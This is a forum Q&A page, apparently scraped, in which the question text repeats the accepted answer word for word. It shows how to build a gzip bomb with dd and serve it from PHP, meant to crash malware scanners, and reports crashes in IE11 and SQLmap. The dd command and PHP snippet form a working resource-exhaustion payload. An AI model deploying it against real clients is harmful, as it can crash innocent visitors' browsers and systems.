[Solved] PHP – Is it possible to implement a gzip bomb in PHP for malware scanners

Question

I found a ready-to-use solution on Github.

It’s called GzipBloat and it does exactly what I was looking for.

First you generate a 10GB gzip file (10MB after first compression) filled with input from /dev/zero

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

In PHP you then set the content encoding and send the gzip file to the client.

header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));

//Turn off output buffering
if (ob_get_level()) ob_end_clean();

readfile('10G.gzip');

Results (Win10):

IE11: Memory rises, then IE Crashes
Chrome 52: Memory rises, error is shown
Edge 38: Memory rises, then drops and nothing is displayed (seems to load forever)
Nikto: Scans in regular speed, no memory problems
SQLmap: High memory then crashes

Accepted Answer

I found a ready-to-use solution on Github.

It’s called GzipBloat and it does exactly what I was looking for.

First you generate a 10GB gzip file (10MB after first compression) filled with input from /dev/zero

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

In PHP you then set the content encoding and send the gzip file to the client.

header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));

//Turn off output buffering
if (ob_get_level()) ob_end_clean();

readfile('10G.gzip');

Results (Win10):

IE11: Memory rises, then IE Crashes
Chrome 52: Memory rises, error is shown
Edge 38: Memory rises, then drops and nothing is displayed (seems to load forever)
Nikto: Scans in regular speed, no memory problems
SQLmap: High memory then crashes